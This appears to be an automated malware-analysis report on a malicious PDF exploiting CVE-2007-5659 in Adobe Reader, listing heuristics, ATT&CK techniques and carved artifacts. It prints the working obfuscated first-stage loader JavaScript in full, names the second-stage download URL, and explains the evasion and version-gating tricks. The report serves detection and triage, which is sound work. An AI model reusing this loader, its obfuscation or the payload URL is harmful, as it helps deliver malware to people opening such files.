Verdict: MALICIOUS
Risk Score: 366

Malware Insights

MITRE ATT&CK
- T1203 Exploitation for Client Execution
- T1059.007 JavaScript
The PDF file contains obfuscated JavaScript that exploits CVE-2007-5659 in Adobe Reader. The script is designed to download a second-stage payload from the URL http://plevok.info/page/gold.php/n00a106201r0007R43329fdcX7906b43bY0fbf44c8Z0100f080. The presence of multiple exploit-related heuristics and the embedded URL strongly indicate a malicious dropper.
Machine Learning
- Nyx PDF Classifier: malicious score 1.0000

Heuristics (10)
- Collab.collectEmailInfo — CVE-2007-5659 (critical; CVE exact; rule CVE_2007_5659): PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (Identified after JavaScript deobfuscation.)
- JavaScript action (low; 5 related findings; rule PDF_JAVASCRIPT): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) (high; CVE likely; rule PDF_JS_ADOBE_APSB08_13_PATCH_GATE): PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
- PDF JavaScript exploit cluster (critical; rule PDF_JS_EXPLOIT_CLUSTER): PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
- Obfuscated multi-stage PDF JavaScript dropper (high; rule PDF_JS_OBFUSCATED_DROPPER): PDF JavaScript shows 4 independent signals of exploit-kit-style multi-stage obfuscation: annot_subject_stage, hex_codec_loop, incremental_eval_build, repeated_pluginschk. This is strongly consistent with pre-2011 Adobe Reader PDF droppers — OpenAction JS reads encoded data from annotation subjects, decodes it through one or more hex / base-N loops, and invokes eval indirectly (method name built one character at a time). The actual CVE is hidden in the final decoded layer and is not visible via static analysis.
- PDF JavaScript shellcode contains an embedded download URL (high; rule PDF_JS_SHELLCODE_DOWNLOAD_URL): Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
- Embedded JS stream (low; rule PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- ClamAV: Pdf.Exploit.Agent-35901 (critical; rule CLAMAV_DETECTION): ClamAV detected this file as malware: Pdf.Exploit.Agent-35901.
- Suspicious extracted artifact (info; rule EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info; rule EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://plevok.info/page/gold.php/n00a106201r0007R43329fdcX7906b43bY0fbf44c8Z0100f080 (referenced by PDF JavaScript).
Extracted artifacts (3)
Files carved from inside the sample during analysis.

javascript_obj0009_000.js
- SHA-256: 4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d
- Kind: pdf-javascript-stream
- Source: PDF /JS object 9 at offset 0x434B
- Size: 469 bytes
- Detection, ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 1 eval/decoder/string-building token(s))

Preview script (first 1,000 lines of the extracted script):
```javascript
var pr = null;
var fnc = 'ev';   // the method name "eval" is assembled one character at a time
var sum = '';
app.doc.syncAnnotScan();
if (app.plugIns.length != 0) {
    var num = 1;
    // the subject field of the second annotation on page 0 carries the encoded next stage
    pr = app.doc.getAnnots({ nPage: 0 });
    sum = pr[num].subject;
}
var buf = "";
if (app.plugIns.length > 3) {
    fnc += 'a';
    // the subject is a '-'-separated list of hex bytes; decode each into a character
    var arr = sum.split(/-/);
    for (var i = 1; i < arr.length; i++) {
        buf += String.fromCharCode("0x" + arr[i]);
    }
    fnc += 'l';
}
if (app.plugIns.length >= 2) {
    // app["eval"](buf): the decoded stage is executed without "eval" ever appearing literally
    app[fnc]/**/(buf);
}
```
legacy_pdfkit_stage_000.js
- SHA-256: 867c370d4a94c5d2646244666ea0abee087da290e650b70990774142af0eb3d8
- Kind: deobfuscated-js
- Source: z-percent UTF-16BE base-21 decoded JavaScript at offset 0x1AAD
- Size: 5274 bytes
- Detection, ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 5 eval/decoder/string-building token(s))

Preview script (first 1,000 lines of the extracted script):
deobfuscated.js
- SHA-256: 56aba845aca7702f7190d645ea9283137bb6460ff810f80d00ea25c8bb149d42
- Kind: deobfuscated-js
- Source: PDF JavaScript deobfuscation pass
- Size: 119736 bytes
- Detection, ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 4 eval/decoder/string-building token(s) and 2 long base64-like blob(s))